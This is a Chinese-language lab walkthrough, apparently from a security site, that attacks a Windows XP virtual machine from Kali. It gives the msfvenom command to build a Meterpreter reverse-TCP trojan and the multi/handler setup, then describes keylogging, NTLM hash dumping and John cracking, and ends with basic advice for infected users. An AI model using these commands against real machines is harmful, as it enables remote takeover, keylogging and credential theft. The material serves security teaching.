一、环境配置(两台主机均采用NAT桥接模式)
1、Kali主机的IP配置:
2、winxp主机的IP配置:
二、远程控制计算机
1、利用msfvenom工具生成一个木马控制端—shell.exe,并把该木马程序保存到root用户下
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.22 lport=1211 -f exe > /root/shell.exe
2、将shell.exe文件拷贝到WINXP的桌面上
3、启用MSF攻击平台
4、加载模块和选择Payload
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
5、设置Payload参数 Lhost为kali的IP,Lport 为kali监听的端口
msf5 exploit(multi/handler) > set lhost 192.168.1.22
msf5 exploit(multi/handler) > set lport 1211
6、双击执行WINXP主机上的shell.exe文件
7、在kali上实施渗透攻击
8、在kali上实施键盘记录
1)输入如下命令启用键盘记录功能
(2)在windows xp2的CMD.exe环境下输入命令
(3)在kali上打开键盘记录文件,可以看到文件中记录下来在windows xp2中输入的内容。
9、用john(密码破解工具)破解windows xp2在任务1创建的用户(即自己姓名的拼音小写首字母)密码,实验中用户名为:zs ,密码为:police
(1)将用于破解的密码词典password.lst文件拷贝到root用户目录下
(2)在kali上用命令hashdump获取windows xp2的用户名及加密后的密码(NTLM hash值)
(3)将zs用户的密码NTLM hash值保存在zs.hash文件中,并查看
(4)启用john的图形化界面
(5)打开zs.hash文件进行破解
(6)选择要破解的密码加密算法和密码词典(password.lst)
(7)开始破解密码
(8)密码破解成功
现在木马已经是非常常见的了,在我们的日常生活中计算机中了木马要怎么办?
发现电脑中了木马之后,第一件事儿要断网,因为木马不会对电脑有什么危害,但是它会把你电脑的一些信息游戏帐号等发给黑客,断网后,如果电脑没有杀毒软件,重启后就不停按F8,选择进入网络安全模式,在安全模式下木马没办法自动运行去盗号,然后在网络安全模式下,下载电脑的杀毒软件进行杀毒。
来源:freebuf.com 2021-05-23 17:42:16 by: yggcwhat
请登录后发表评论
注册